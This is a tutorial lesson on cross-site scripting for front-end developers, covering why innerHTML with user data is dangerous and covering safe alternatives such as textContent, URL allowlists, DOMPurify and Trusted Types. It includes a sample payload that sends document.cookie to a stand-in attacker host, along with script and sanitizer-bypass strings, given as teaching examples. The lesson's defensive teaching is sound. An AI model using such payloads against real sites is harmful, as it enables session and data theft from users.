Sanitization and the XSS threat model
Why innerHTML with user data is dangerous, what an XSS attack actually does, and the safe alternatives.
You finished a course on the DOM. You know how to read it, change it, listen to it, and update it without breaking accessibility. The last skill is the one that keeps you out of incident reports: don't ship cross-site scripting holes.
Cross-site scripting (XSS) is the family of bugs where an attacker gets your page to run JavaScript they wrote. They do not need to break into your server; they only need to get your page to insert a string they control as if it were code. From there, your user is the victim — the attacker now runs in their session.
The good news: the rule that prevents almost all of it is the same rule lesson 3 introduced. This lesson explains why that rule matters and what to do in the cases where you cannot follow it as-is.
What XSS actually does
Imagine your app shows a comment under each blog post. You read the comment text from a database and insert it into the page like this:
// DON'T:
const el = document.querySelector('.comment');
el.innerHTML = comment.text;
A friendly comment is just text and renders as text. Now suppose someone posts a comment whose content is:
<img src="x" onerror="fetch('https://evil.example/steal?c=' + document.cookie)">
The browser parses that string as HTML and builds a real <img> element. The src="x" does not point at a real image, so the load fails, and that triggers the onerror handler. The handler fires a request to the attacker's server with the user's cookies in the URL. Unless the session cookie is marked HttpOnly (which hides it from document.cookie), every visitor who reads that comment quietly hands over their session.
That is a complete XSS attack. The attacker did not touch your server. They typed text. Your page was the loaded gun, their text was the bullet, and innerHTML pulled the trigger.
Other things attackers can do once they execute JavaScript in your page:
- Read any data the user can read — emails, messages, account info — and send it elsewhere.
- Make requests to your API as the logged-in user. Change passwords. Move money. Send messages.
- Show a fake login form on your real domain to harvest credentials.
The rule of thumb for the threat model: if an attacker controls a string and your code parses it as HTML or JavaScript, the attacker now controls your page in the user's browser.
Quick check: your code does nameEl.innerHTML = user.name. A user signs up with the name <script>alert(1)</script>. They reload the page. What happens?
The rule that prevents almost all of it
Almost every XSS bug fits the same shape: user-controlled string → parsed as HTML or JavaScript by your code. The rule that prevents almost all of those bugs is one line:
Use textContent for any string that touched user input. Reserve innerHTML for strings you wrote yourself.
If you only write text, an attacker can post <script> tags all day; you write the literal characters into a text node and the browser shows them as characters. There is no parser to trick.
The same rule extends to several lookalike methods:
- element.innerHTML = userText is bad. Use textContent.
- element.outerHTML = userText is bad. Same parser, and it also replaces the element itself.
- element.insertAdjacentHTML(pos, userText) is bad. Same parser.
- document.write(userText) is bad, and document.write should leave your vocabulary altogether.
- <a href={userUrl}>, where userUrl could be javascript:alert(1), is bad. Validate the URL and allow only safe schemes such as http: and https:; stripping the javascript: prefix is easy to bypass.
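For the URL case, here is a minimal sketch of the check, assuming the link should only ever point at ordinary web pages. safeHref and ALLOWED_PROTOCOLS are hypothetical names, not a library API. The sketch parses the input with the standard URL constructor and allows only known-good schemes instead of trying to strip javascript:, because stripping is easy to fool: removing "javascript:" once from "javajavascript:script:alert(1)" leaves exactly "javascript:alert(1)".

```javascript
// Hypothetical helper: returns a normalized URL that is safe to use as an
// href, or null if the input should be rejected.
// Assumption: only absolute http(s) links are acceptable here.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

function safeHref(userUrl) {
  let parsed;
  try {
    // The URL parser drops leading/trailing spaces and control characters,
    // removes tabs and newlines, and lowercases the scheme, so
    // " JavaScript:..." still reports protocol "javascript:".
    // Relative URLs throw here and are therefore rejected.
    parsed = new URL(userUrl);
  } catch {
    return null; // not an absolute URL at all
  }
  // Allowlist, not blocklist: anything other than http/https is refused,
  // including javascript:, data: and vbscript:.
  return ALLOWED_PROTOCOLS.has(parsed.protocol) ? parsed.href : null;
}

console.log(safeHref('https://example.org/me'));   // https://example.org/me
console.log(safeHref(' JavaScript:alert(1)'));      // null
console.log(safeHref('data:text/html,<b>hi</b>'));  // null
```

In the page, assign only a non-null result (for example, if (href) anchor.href = href;) and otherwise leave the link out. If your app legitimately needs relative links or mailto:, widen the allowlist deliberately rather than switching to a blocklist.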
The safe equivalents:
- Text into an element: element.textContent = userText.
- Markup with user data inside: createElement for the structure, textContent for any user pieces, and setAttribute (or properties) for attributes. URL-valued attributes such as href still need the URL check from the list above.
// Safe construction — no parsing of user input:
const li = document.createElement('li');
li.className = 'comment';
const author = document.createElement('strong');
author.textContent = comment.author; // text node, attacker-proof
const body = document.createElement('span');
body.textContent = comment.text; // text node, attacker-proof
li.append(author, ': ', body);
list.append(li);
Notice what happened. We built the structure ourselves with createElement, set the user-controlled parts as text, and the browser never parsed an attacker-controlled string. There is nowhere for an attack to land.
When you find yourself building an HTML string by concatenating user input with tags, stop. That is the exact shape that creates XSS bugs. Build the elements with createElement instead, and put the user input through textContent or attribute setters.
When you do need formatting
Sometimes you genuinely need to render user-supplied content with formatting. A comment that allows bold, italic, and links. A markdown editor. A rich-text field.
You have two safe paths.
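One, render through a format you control. If the user writes Markdown, parse it server-side or with a trusted Markdown library configured so that raw HTML in the input is escaped or dropped rather than passed through. The library then emits only the small set of tags Markdown defines, with the user's text escaped inside them; the raw user input never reaches the HTML parser as markup. Check the defaults: some Markdown libraries pass embedded HTML through unchanged, and links written in Markdown still need the same URL check as any other user URL.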
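A minimal sketch of the first path, assuming a made-up two-rule format (**bold** and *italic*) rather than real Markdown; renderTinyFormat and escapeHtml are hypothetical names. The point is the order of operations: escape everything the user typed first, then add only tags you wrote.

```javascript
// Escape the characters that could open a tag, close an attribute, or start
// an entity. '&' must go first so later replacements are not double-escaped.
function escapeHtml(text) {
  return text
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical, deliberately tiny "format you control". Not a Markdown parser.
function renderTinyFormat(userText) {
  // Step 1: after escaping, nothing in the user's input can open a tag.
  const escaped = escapeHtml(userText);
  // Step 2: the only markup in the output is markup added here, and these
  // tags carry no attributes for an attacker to influence.
  return escaped
    .replace(/\*\*(.+?)\*\*/g, '<strong>$1</strong>')
    .replace(/\*(.+?)\*/g, '<em>$1</em>');
}

console.log(renderTinyFormat('**hi** <img src=x onerror=alert(1)>'));
// <strong>hi</strong> &lt;img src=x onerror=alert(1)&gt;
```

A real Markdown library does far more, but the property to look for is the same: the only tags in its output are tags the library generated.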
Two, sanitize. A sanitizer takes an HTML string and returns a stripped-down version with dangerous tags and attributes removed: no <script>, no onerror, no javascript: URLs. The standard pick is DOMPurify — a small, well-audited library that you call once per insertion.
import DOMPurify from 'dompurify';

// Removes <script>, event-handler attributes, javascript: URLs, and similar.
const clean = DOMPurify.sanitize(comment.html);
commentEl.innerHTML = clean;
The wrong way to sanitize: write your own regex-based "remove <script> tags" function. The list of dangerous patterns is long, evolving, and full of obscure cases (data: URLs, SVG event handlers, mutation XSS via parser quirks). A proper sanitizer takes years of issues and patches to ship safely. Use DOMPurify; do not invent your own.
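To make the warning concrete, here is a hypothetical hand-rolled sanitizer of exactly the kind described, shown only so it can be broken. naiveStripScripts is an illustrative name, not code anyone should ship. Two inputs defeat it: one never uses a <script> tag at all, and the other makes the regex reassemble the very tag it was meant to remove.

```javascript
// DON'T: a hypothetical regex "sanitizer" that only removes <script> blocks.
function naiveStripScripts(html) {
  return html.replace(/<script.*?>.*?<\/script>/gi, '');
}

// Bypass 1: no <script> tag needed; the event handler passes through untouched.
const viaHandler = naiveStripScripts('<img src=x onerror=alert(1)>');

// Bypass 2: deleting the inner tags glues the outer fragments back together.
const reassembled = naiveStripScripts(
  '<scr<script></script>ipt>alert(1)</scr<script></script>ipt>'
);

console.log(viaHandler);  // <img src=x onerror=alert(1)>
console.log(reassembled); // <script>alert(1)</script>
```

Patching these two cases just invites the next one, which is the argument for a maintained sanitizer.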
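Decide where you sanitize and be explicit about it: on the way in (when saving), on the way out (when rendering), or both. Sanitizing only on save keeps your stored data clean, but data that reaches the page by another path, such as an older endpoint, an import script, or a future bug, will render unsanitized. Sanitizing on render protects the sink no matter how the data got there, so it is the more defensive choice.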
Trusted Types in one paragraph
Modern browsers offer a feature called Trusted Types that bans raw strings from being assigned to dangerous sinks like innerHTML. With Trusted Types enforced (via the require-trusted-types-for directive in a Content-Security-Policy header), only special "trusted" objects produced by an explicit policy can be assigned. That means a future bug that does innerHTML = userText does not silently work: the assignment throws a TypeError, and if you have CSP reporting configured, the violation shows up in your reports.
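A minimal sketch of what turning it on involves, assuming you can set response headers; the policy name comment-html is hypothetical. trustedTypes.createPolicy and the policy's createHTML method are the browser API, while escapeHtml and toCommentHtml are illustrative helpers. Where Trusted Types is unavailable (Node, or a browser without support), the code falls back to returning an escaped string.

```javascript
// Assumed response header ("comment-html" is a hypothetical policy name):
//   Content-Security-Policy: require-trusted-types-for 'script'; trusted-types comment-html

function escapeHtml(text) {
  return text
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The policy is the single place where a string may become TrustedHTML.
// This one escapes; a policy for rich content might call DOMPurify.sanitize.
const commentPolicy = globalThis.trustedTypes
  ? globalThis.trustedTypes.createPolicy('comment-html', { createHTML: escapeHtml })
  : null; // no Trusted Types support in this environment

function toCommentHtml(text) {
  return commentPolicy ? commentPolicy.createHTML(text) : escapeHtml(text);
}

// With the header enforced in a supporting browser:
//   el.innerHTML = userText;                 // throws TypeError
//   el.innerHTML = toCommentHtml(userText);  // allowed: the value is TrustedHTML
```

Keeping policies few and named in the header is the design point: a code review only has to audit the policy bodies, not every innerHTML assignment.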
You do not need this on day one. You need to know it exists, and that turning it on later is one of the cleanest ways to make sure no future code reintroduces the bug class. Look it up when you have time; it is worth the read.
A short checklist
The whole lesson, in five lines:
- Default to textContent. It can never execute markup.
- Reach for innerHTML only with strings you wrote yourself.
- For rich user content, use a sanitizer like DOMPurify, never a hand-rolled regex.
- Validate URLs that come from users before assigning them to href: allow only safe schemes such as http: and https:, which rejects javascript:.
- When in doubt, build with createElement and textContent. The browser never parses an attacker-controlled string.
Quick check: your code does anchor.href = profile.url, where profile.url came from a user signup. What is the smallest fix that closes a real attack?